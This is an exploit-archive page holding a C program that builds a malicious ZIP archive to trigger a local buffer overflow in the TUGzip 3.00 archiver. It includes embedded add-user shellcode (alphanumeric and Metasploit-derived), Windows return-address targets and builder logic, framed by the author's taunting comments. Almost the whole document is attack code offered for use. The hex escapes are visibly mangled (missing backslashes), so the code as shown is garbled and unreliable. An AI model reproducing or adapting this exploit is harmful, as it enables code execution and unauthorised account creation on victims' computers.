[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TUGzip 3.00 archiver .ZIP File Local Buffer Overflow Exploit
# Published : 2008-10-24
# Author : fl0 fl0w
# Previous Title : Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit
# Next Title : VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)
/*0day TUGzip 3.00 archiver .ZIP File Local Buffer Overflow
"If you change things ,forever,there's no going back,you see for them you're just a freak, like me ..Mhaaaahaaaaaaaaaaaaaaaaaaaa"(JK)
Well hello there ,greetz from Romania,here is a exploit for the archiver TUGzip.
So the payload doesen't always execute,it's just a matter of patience,from 10
attemps you get success on 2 in the best case.Got 3 more archivers with stack
overflow and heap overflow,I'm bored... I'm looking for a new approach,will see
soon what I'm going to bring you.
"Let's put a smile on that face Mhaaaaaaaaahhaaahaaahhhhhhaaaaaaaaaaaaaaaaaa"
Credits go to Stefan Marin or fl0 fl0w :) .
All the best !
Registers
EAX 00000000
ECX 00000064
EDX 0013F6D0
EBX 0117ABDC
ESP 0013F6D0
EBP 45444342
ESI 0117AF6C
EDI 00D88B1C
EIP 58585858
SEH chain of main thread, item 0
Address=0013F6D0
SE handler=C9C9C9C9
*/
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<windows.h>
#define OFFSET 2504
#define NOP 2515
#define shellcode_offset 2535
char file_1[]=
"x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00"
"x00x00x00x00x00x00x00x00x00x00x14x08x00x00x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x66x66x64x73x75x69x62x7Ax65x6Fx69x76x7Ax20x66x68"
"x65x6Fx20x79x66x6Fx7Ax69x61x71x20x6Fx69x65x61x7A"
"x75x20x7Ax71x6Fx66x68x75x65x7Ax71x6Fx69x65x6Ex66"
"x65x7Ax6Ax75x71x63x62x75x71x70x7Ax61x7Ax69x27x74"
"x75x72x65x6Fx7Ax6Ex62x69x6Ax75x76x62x67x73x64x75"
"x69x71x79x72x7Ax61x6Ax20x62x63x73x64x6Fx70x69x75"
"x72x79x7Ax6Fx65x61x71x6Ex62x69x6Fx64x73x79x72x66"
"x65x7Ax71x6Fx69x70x62x75x66x63x73x71x69x75x79x72"
"x61x7Ax62x69x6Ax65x66x62x68x73x75x69x71x76x64x73"
"x71x69x6Ax62x66x65x7Ax71x75x61x66x64x64x64x64x64"
"x64x64x64x64x64x64x64x64x64x64x64x64x64x64x68x68"
"x68x68x68x68x68x68x68x68x68x68x68x68x68x75x75x75"
"x75x75x75x75x75x75x75x75x68x76x71x24x69x66x72x7A"
"x65x6Fx62x76x69x6Fx7Ax65x71x66x74x72x65x6Fx7Ax71"
"x6Ax6Ex62x76x64x73x70x69x79x75x66x71x6Fx65x69x68"
"x66x72x6Fx75x65x7Ax68x61x72x62x20x69x76x66x64x73"
"x70x6Fx68x6Ax72x65x71x6Fx75x68x66x7Ax65x61x71x75"
"x68x76x71x6Fx75x68x65x66x6Fx71x73x69x6Ax68x64x6F"
"x73x71x68x76x64x6Fx69x68x7Ax61x71x6Fx65x69x68x66"
"x64x73x6Fx69x75x68x76x63x78x77x69x75x68x66x71x6F"
"x75x69x68x76x77x78x6Fx69x68x66x64x73x71x6Fx69x68"
"x76x64x73x71x6Fx69x75x68x7Ax67x66x6Fx69x68x73x64"
"x71x6Fx69x75x68x67x7Ax65x71x6Fx69x68x67x73x71x6F"
"x69x68x67x7Ax61x65x7Ax72x75x79x61x75x79x74x61x65"
"x70x69x75x79x55x59x54x4Fx5Ax52x45x50x49x48x47x41"
"x5Ax55x59x56x44x53x4Fx49x59x54x41x50x4Fx49x55x45"
"x59x52x49x55x45x5Ax59x47x42x4Bx4Ax43x58x4Ex4Bx56"
"x4Ex4Bx43x58x42x57x56x4Bx4Ax4Ex42x43x58x48x42x4B"
"x4Ax44x48x46x4Fx49x48x5Ax45x52x4Fx49x55x48x45x5A"
"x55x49x4Fx41x42x45x5Ax55x49x42x47x55x49x56x43x50"
"x4Cx44x53x47x57x4Bx52x54x42x4Ex49x55x43x49x55x4F"
"x51x45x42x48x52x55x49x59x44x46x51x50x5Ax49x55x45"
"x52x50x49x55x44x59x46x54x50x41x49x5Ax55x45x59x52"
"x5Ax45x55x48x52x54x49x55x50x56x58x57x4Bx4Ax43x4E"
"x48x42x47x50x46x4Fx49x55x50x41x49x52x59x45x5Ax4F"
"x41x49x54x59x38x37x33x32x39x35x36x35x39x34x38x33"
"x32x36x35x46x53x34x38x59x46x44x53x39x38x59x55x56"
"x47x30x39x38x51x59x55x52x30x39x38x34x59x35x32x33"
"x39x38x41x59x39x46x38x45x51x59x5Ax35x39x38x59x36"
"x39x38x46x47x59x39x38x51x59x39x47x46x44x53x55x59"
"x30x39x48x34x5Ax48x33x37x38x35x32x33x31x42x34x47"
"x38x30x47x46x44x53x55x49x42x56x51x49x55x4Fx59x50"
"x52x39x5Ax48x46x44x53x51x55x49x47x46x47x44x55x53"
"x53x53x53x53x45x47x46x39x32x47x35x33x34x55x47x46"
"x39x49x53x50x47x42x55x54x50x5Ax39x38x59x35x33x41"
"x41x42x43x43x46x52x45x43x43x45x54x52x45x5Ax47x52"
"x46x44x53x49x4Fx5Ax48x45x52x42x4Ex4Fx56x46x44x53"
"x4Fx49x52x48x54x4Fx5Ax49x4Ex46x47x44x4Bx4Ex46x43"
"x58x4Cx4Bx59x89x05x8Ax9Bx98x98x98x4Fx49x49x49x49"
"x49x49x51x5Ax56x54x58x36x33x30x56x58x34x41x30x42"
"x36x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48"
"x34x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44"
"x41x56x58x34x5Ax38x42x44x4Ax4Fx4Dx4Ex4Fx4Cx36x4B"
"x4Ex4Dx54x4Ax4Ex49x4Fx4Fx4Fx4Fx4Fx4Fx4Fx42x36x4B"
"x38x4Ex46x46x42x46x42x4Bx58x45x44x4Ex43x4Bx38x4E"
"x37x45x30x4Ax57x41x50x4Fx4Ex4Bx48x4Fx34x4Ax51x4B"
"x38x4Fx45x42x32x41x30x4Bx4Ex49x44x4Bx38x46x43x4B"
"x58x41x50x50x4Ex41x43x42x4Cx49x59x4Ex4Ax46x58x42"
"x4Cx46x37x47x30x41x4Cx4Cx4Cx4Dx30x41x30x44x4Cx4B"
"x4Ex46x4Fx4Bx33x46x35x46x32x4Ax52x45x57x45x4Ex4B"
"x48x4Fx35x46x42x41x30x4Bx4Ex48x36x4Bx58x4Ex50x4B"
"x54x4Bx48x4Fx35x4Ex41x41x30x4Bx4Ex43x30x4Ex52x4B"
"x58x49x48x4Ex56x46x32x4Ex31x41x36x43x4Cx41x43x4B"
"x4Dx46x56x4Bx48x43x44x42x53x4Bx48x42x44x4Ex50x4B"
"x38x42x37x4Ex41x4Dx4Ax4Bx48x42x44x4Ax30x50x45x4A"
"x36x50x38x50x44x50x30x4Ex4Ex42x35x4Fx4Fx48x4Dx48"
"x46x43x45x48x56x4Ax46x43x43x44x33x4Ax56x47x37x43"
"x37x44x43x4Fx55x46x45x4Fx4Fx42x4Dx4Ax36x4Bx4Cx4D"
"x4Ex4Ex4Fx4Bx33x42x55x4Fx4Fx48x4Dx4Fx45x49x58x45"
"x4Ex48x56x41x48x4Dx4Ex4Ax50x44x30x45x35x4Cx36x44"
"x50x4Fx4Fx42x4Dx4Ax36x49x4Dx49x50x45x4Fx4Dx4Ax47"
"x45x4Fx4Fx48x4Dx43x55x43x45x43x35x43x35x43x35x43"
"x54x43x55x43x54x43x35x4Fx4Fx42x4Dx48x46x4Ax56x41"
"x41x4Ex45x48x56x43x45x49x48x41x4Ex45x59x4Ax46x46"
"x4Ax4Cx31x42x57x47x4Cx47x55x4Fx4Fx48x4Dx4Cx36x42"
"x41x41x35x45x45x4Fx4Fx42x4Dx4Ax56x46x4Ax4Dx4Ax50"
"x32x49x4Ex47x35x4Fx4Fx48x4Dx43x55x45x45x4Fx4Fx42"
"x4Dx4Ax56x45x4Ex49x54x48x58x49x44x47x45x4Fx4Fx48"
"x4Dx42x35x46x55x46x55x45x55x4Fx4Fx42x4Dx43x39x4A"
"x36x47x4Ex49x47x48x4Cx49x57x47x45x4Fx4Fx48x4Dx45"
"x55x4Fx4Fx42x4Dx48x46x4Cx56x46x36x48x36x4Ax56x43"
"x46x4Dx36x49x48x45x4Ex4Cx46x42x45x49x35x49x32x4E"
"x4Cx49x38x47x4Ex4Cx56x46x34x49x58x44x4Ex41x43x42"
"x4Cx43x4Fx4Cx4Ax50x4Fx44x54x4Dx32x50x4Fx44x34x4E"
"x52x43x39x4Dx38x4Cx37x4Ax33x4Bx4Ax4Bx4Ax4Bx4Ax4A"
"x56x44x57x50x4Fx43x4Bx48x41x4Fx4Fx45x37x46x44x4F"
"x4Fx48x4Dx4Bx45x47x45x44x55x41x35x41x45x41x35x4C"
"x36x41x30x41x55x41x45x45x45x41x45x4Fx4Fx42x4Dx4A"
"x46x4Dx4Ax49x4Dx45x30x50x4Cx43x55x4Fx4Fx48x4Dx4C"
"x36x4Fx4Fx4Fx4Fx47x43x4Fx4Fx42x4Dx4Bx48x47x45x4E"
"x4Fx43x58x46x4Cx46x46x4Fx4Fx48x4Dx44x45x4Fx4Fx42"
"x4Dx4Ax56x42x4Fx4Cx48x46x50x4Fx45x43x55x4Fx4Fx48"
"x4Dx4Fx4Fx42x4Dx5Ax32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x41x49x89x04x02x12x01x61x82xFDx81x98x98x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x2Ex74"
"x78x74x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xAC"
"xCEx34x00x00x00x00x00x00x00x00x00x00x00x00x14x08"
"x00x00x00x00x00x00x01x00x24x00x00x00x00x00x00x00"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x44x44x44x44x44x44x44x44x44x44x44x44x44"
"x44x44x44x44x44x44x44x44x44x44x44x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x45x45x45x45x45x45x45x45x45x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x45x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x43x43x43x43x43x43x43x43x43"
"x43x43x43x43x43x43x43x43x43x43x43x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x41x42x43x44x45x58x58x58x58x41x41x41x41";
char file_2[]=
"x41x41x41x41xCCxCCxCCxCCx41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x4Ax4Ax4Ax4Ax4Ax4A"
"x4Ax4Ax4Ax4Ax4Ax4Ax4Ax32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x4Bx4Bx4Bx4Bx4Bx4Bx4Bx4Bx4Bx4B"
"x4Bx4Bx4Bx4Bx4Bx4Bx4Bx4Bx4Bx4Bx4Bx32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x4Cx4Cx4Cx4Cx4Cx4Cx4Cx4C"
"x4Cx4Cx4Cx4Cx4Cx4Cx4Cx4Cx4Cx32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x4Dx4Dx4Dx4Dx4Dx4Dx4Dx32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x4Ex4Ex4Ex4Ex4Ex4Ex4Ex4Ex4Ex4E"
"x4Ex4Ex4Ex4Ex4Ex32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x4Fx4Fx4Fx4F"
"x4Fx4Fx4Fx4Fx4Fx4Fx4Fx4Fx4Fx4Fx4Fx4Fx4Fx32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x50x50x50x50x50x50"
"x50x50x50x50x50x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x51x51x51x51x51x51x51"
"x51x51x32x32x32x32x32x89x03x59x89x05x8Ax9Bx98x98"
"x98x4Fx49x49x49x49x49x49x51x5Ax56x54x58x36x33x30"
"x56x58x34x41x30x42x36x48x48x30x42x33x30x42x43x56"
"x58x32x42x44x42x48x34x41x32x41x44x30x41x44x54x42"
"x44x51x42x30x41x44x41x56x58x34x5Ax38x42x44x4Ax4F"
"x4Dx4Ex4Fx4Cx36x4Bx4Ex4Dx54x4Ax4Ex49x4Fx4Fx4Fx4F"
"x4Fx4Fx4Fx42x36x4Bx38x4Ex46x46x42x46x42x4Bx58x45"
"x44x4Ex43x4Bx38x4Ex37x45x30x4Ax57x41x50x4Fx4Ex4B"
"x48x4Fx34x4Ax51x4Bx38x4Fx45x42x32x41x30x4Bx4Ex49"
"x44x4Bx38x46x43x4Bx58x41x50x50x4Ex41x43x42x4Cx49"
"x59x4Ex4Ax46x58x42x4Cx46x37x47x30x41x4Cx4Cx4Cx4D"
"x30x41x30x44x4Cx4Bx4Ex46x4Fx4Bx33x46x35x46x32x4A"
"x52x45x57x45x4Ex4Bx48x4Fx35x46x42x41x30x4Bx4Ex48"
"x36x4Bx58x4Ex50x4Bx54x4Bx48x4Fx35x4Ex41x41x30x4B"
"x4Ex43x30x4Ex52x4Bx58x49x48x4Ex56x46x32x4Ex31x41"
"x36x43x4Cx41x43x4Bx4Dx46x56x4Bx48x43x44x42x53x4B"
"x48x42x44x4Ex50x4Bx38x42x37x4Ex41x4Dx4Ax4Bx48x42"
"x44x4Ax30x50x45x4Ax36x50x38x50x44x50x30x4Ex4Ex42"
"x35x4Fx4Fx48x4Dx48x46x43x45x48x56x4Ax46x43x43x44"
"x33x4Ax56x47x37x43x37x44x43x4Fx55x46x45x4Fx4Fx42"
"x4Dx4Ax36x4Bx4Cx4Dx4Ex4Ex4Fx4Bx33x42x55x4Fx4Fx48"
"x4Dx4Fx45x49x58x45x4Ex48x56x41x48x4Dx4Ex4Ax50x44"
"x30x45x35x4Cx36x44x50x4Fx4Fx42x4Dx4Ax36x49x4Dx49"
"x50x45x4Fx4Dx4Ax47x45x4Fx4Fx48x4Dx43x55x43x45x43"
"x35x43x35x43x35x43x54x43x55x43x54x43x35x4Fx4Fx42"
"x4Dx48x46x4Ax56x41x41x4Ex45x48x56x43x45x49x48x41"
"x4Ex45x59x4Ax46x46x4Ax4Cx31x42x57x47x4Cx47x55x4F"
"x4Fx48x4Dx4Cx36x42x41x41x35x45x45x4Fx4Fx42x4Dx4A"
"x56x46x4Ax4Dx4Ax50x32x49x4Ex47x35x4Fx4Fx48x4Dx43"
"x55x45x45x4Fx4Fx42x4Dx4Ax56x45x4Ex49x54x48x58x49"
"x44x47x45x4Fx4Fx48x4Dx42x35x46x55x46x55x45x55x4F"
"x4Fx42x4Dx43x39x4Ax36x47x4Ex49x47x48x4Cx49x57x47"
"x45x4Fx4Fx48x4Dx45x55x4Fx4Fx42x4Dx48x46x4Cx56x46"
"x36x48x36x4Ax56x43x46x4Dx36x49x48x45x4Ex4Cx46x42"
"x45x49x35x49x32x4Ex4Cx49x38x47x4Ex4Cx56x46x34x49"
"x58x44x4Ex41x43x42x4Cx43x4Fx4Cx4Ax50x4Fx44x54x4D"
"x32x50x4Fx44x34x4Ex52x43x39x4Dx38x4Cx37x4Ax33x4B"
"x4Ax4Bx4Ax4Bx4Ax4Ax56x44x57x50x4Fx43x4Bx48x41x4F"
"x4Fx45x37x46x44x4Fx4Fx48x4Dx4Bx45x47x45x44x55x41"
"x35x41x45x41x35x4Cx36x41x30x41x55x41x45x45x45x41"
"x45x4Fx4Fx42x4Dx4Ax46x4Dx4Ax49x4Dx45x30x50x4Cx43"
"x55x4Fx4Fx48x4Dx4Cx36x4Fx4Fx4Fx4Fx47x43x4Fx4Fx42"
"x4Dx4Bx48x47x45x4Ex4Fx43x58x46x4Cx46x46x4Fx4Fx48"
"x4Dx44x45x4Fx4Fx42x4Dx4Ax56x42x4Fx4Cx48x46x50x4F"
"x45x43x55x4Fx4Fx48x4Dx4Fx4Fx42x4Dx5Ax32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x41x49x89x04x02x12x01x61"
"x82xFDx81x98x98x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x2Ex74x78x74x50x4Bx05x06x00x00x00x00"
"x01x00x01x00x42x08x00x00x32x08x00x00";
char shellcode_1[]=
// Skylined's alpha2 unicode decoder
//Un-encoded ADD USER shellcode
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABA"
"BABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"
// Encoded opcodes
"ylzHOTM0KPkP2kQ5OL2kQlKUt8kQzOtK0On82k1OO0KQ8kpIDKoDTKKQXnnQ7P4Y4lU4upptm7i1WZLM"
"kQWRJKJTMkpTLdzdt59UdKooktkQzKOv4KlLNkDKooMLyqZKBkMLRkzajKQyQLmTM45sNQUpotRkmplp"
"tEupQhlLBkoPlLRkRPKlvMRkoxjhzKKYtKqpFPkPm0KPbkphMlaOlqhvqPPVriJXCS5pCKNpOxJO8Nk0"
"C0c8eHKNqzznPW9oyW1SBMotnNaUQhaUkpNOpckpRNOuqdmPRUpsqUPrmP%skp%s"
"mPnOQ1OTNdo0mVMVMPpnOurTMP0lBOqS31PlC7prpobU0pkpoQotPmoyPn1YT3ptT2aQPtpo1bBSkp%s"
"MPNOOQa4oTkPA";
//ADD USER shellcode TNX to metasploit
char shellcode_2[]=
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x50"
"x8axfax90x83xebxfcxe2xf4xacxe0x11xddxb8x73x05x6f"
"xafxeax71xfcx74xaex71xd5x6cx01x86x95x28x8bx15x1b"
"x1fx92x71xcfx70x8bx11xd9xdbxbex71x91xbexbbx3ax09"
"xfcx0ex3axe4x57x4bx30x9dx51x48x11x64x6bxdexdexb8"
"x25x6fx71xcfx74x8bx11xf6xdbx86xb1x1bx0fx96xfbx7b"
"x53xa6x71x19x3cxaexe6xf1x93xbbx21xf4xdbxc9xcax1b"
"x10x86x71xe0x4cx27x71xd0x58xd4x92x1ex1ex84x16xc0"
"xafx5cx9cxc3x36xe2xc9xa2x38xfdx89xa2x0fxdex05x40"
"x38x41x17x6cx6bxdax05x46x0fx03x1fxf6xd1x67xf2x92"
"x05xe0xf8x6fx80xe2x23x99xa5x27xadx6fx86xd9xa9xc3"
"x03xd9xb9xc3x13xd9x05x40x36xe2xebxccx36xd9x73x71"
"xc5xe2x5ex8ax20x4dxadx6fx86xe0xeaxc1x05x75x2axf8"
"xf4x27xd4x79x07x75x2cxc3x05x75x2axf8xb5xc3x7cxd9"
"x07x75x2cxc0x04xdexafx6fx80x19x92x77x29x4cx83xc7"
"xafx5cxafx6fx80xecx90xf4x36xe2x99xfdxd9x6fx90xc0"
"x09xa3x36x19xb7xe0xbex19xb2xbbx3ax63xfax74xb8xbd"
"xaexc8xd6x03xddxf0xc2x3bxfbx21x92xe2xaex39xecx6f"
"x25xcex05x46x0bxddxa8xc1x01xdbx90x91x01xdbxafxc1"
"xafx5ax92x3dx89x8fx34xc3xafx5cx90x6fxafxbdx05x40"
"xdbxddx06x13x94xeex05x46x02x75x2axf8x2ex52x18xe3"
"x03x75x2cx6fx80x8axfax90";
struct addresses
{ char *platform;
unsigned long addr;
}
targets[]=
{
{ "[*]Microsoft Windows XP 5.1.1.0 SP1 (IA32)English(jmp esp)",0x778eadcf },
{ "[*]Microsoft Windows Pro sp3 English (call esp)",0x7C8369F0 },
{ "[*]Microsoft Windows Pro sp3 English (jmp esp)",0x7C86467B },
{ "[*]Windows XP 5.1.2.0 SP2 (IA32) English (jmp esp)",0x7d184de7 },
{ "[*]Windows XP 5.1.2.0 SP2 (IA32) German (jmp esp)",0x77d85197 },
{ "[*]Windows 2000 5.0.1.0 SP1 (IA32) English (jmp esp)",0x69952208 },
{ "[*]Crash the program",0x58585858 },
{NULL }
};
int main(int argc,char *argv[])
{ FILE *h;
char *buffer;
buffer=(char *)malloc(sizeof(file_1)+sizeof(file_2));
unsigned int offset=0;
int number;
unsigned int retaddress=targets[atoi(argv[2])].addr;
if(argc<2)
{ printf("# tChose your Platform #n");
for(int i=0;targets[i].platform;i++)
printf("%d tt %sn",i,targets[i].platform);
printf("tUsage is:n");
printf(argv[0]);
printf(".exe ");
printf("filename.zip ");
printf("platformn");
printf("t*****Credits for exploit and finding the bug go to Stefan Marin******n");
system("color 02");
Sleep(2000);
return 0;
}
if((h=fopen(argv[1],"wb"))==NULL)
{ printf("errorn");
exit(0);
}
memcpy(buffer,file_1,sizeof(file_1)); offset=sizeof(file_1);
memcpy(buffer+offset-1,file_2,sizeof(file_2)); offset=OFFSET;
memcpy(buffer+offset,&retaddress,4); offset=0; offset=NOP;
memset(buffer+offset,0x90,20);
printf("#___________________________________________________________________________#n");
printf("Now chose your shellcode n");
printf("Press [1] for Alphanumeric shellcoden");
printf("Press [2] for NonAphanumeric shellcoden");
printf("#___________________________________________________________________________#n");
scanf("%d",&number);
switch(number)
{ case 1:
offset=shellcode_offset;
memcpy(buffer+offset,shellcode_1,sizeof(shellcode_1));
case 2:
offset=shellcode_offset;
memcpy(buffer+offset,shellcode_2,sizeof(shellcode_2));
}
fwrite(buffer,1,sizeof(file_1)+sizeof(file_2),h);
printf("Building file ...n");
printf("Done ! Open with TUGzip and see what happens :) n");
printf("t*****Credits for exploit and finding the bug go to Stefan Marin******n");
fclose(h);
free(buffer);
return 0;
}
// www.Syue.com [2008-10-24]